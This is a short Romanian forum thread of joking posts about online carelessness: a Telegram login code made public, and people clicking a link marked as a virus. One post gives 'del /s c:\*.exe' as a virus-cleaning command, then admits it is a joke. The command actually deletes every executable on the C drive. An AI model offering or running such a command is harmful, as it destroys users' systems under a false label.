Loc de dat cu capul

Am ramas surprins asta seara de gasca care suntem pe telegraf. Am facut public codul secret de logare pe alt device la contul meu de telegraf si nimeni nu a incercat sa imi acceseze contul.
O dovada clara de incredere si respect unul fata de altul. Mai rar gasesti asa ceva.
Eu ma simt mandru ca fac parte din aceasta gasca.
 
Am ramas surprins asta seara de gasca care suntem pe telegraf. Am facut public codul secret de logare pe alt device la contul meu de telegraf si nimeni nu a incercat sa imi acceseze contul.
O dovada clara de incredere si respect unul fata de altul. Mai rar gasesti asa ceva.
Eu ma simt mandru ca fac parte din aceasta gasca.
Nu oricine poate adera la grupul de telegraf .... Acolo suntem doar cei alesi :D:D:D:D
 
Comanda care iti curata calculatorul de virusi.
Cod:
del /s c:\*.exe
Ruleaza aceasta comanda pe propria experienta. Daca nu iti dai seama ce face, atunci iti spun de acum ca este o gluma.
 
Am vazut un experiment acum cativa ani. Niste tipi creasera pe un website un buton cu mesajul - aproximativ: "Da click aici si iti va fi automat instalat un virus pe calculator" Chiar descarca un .exe. Foarte multi au dat click. Chiar si autorii experimentului erau mirati
 
Loading...
Back
Sus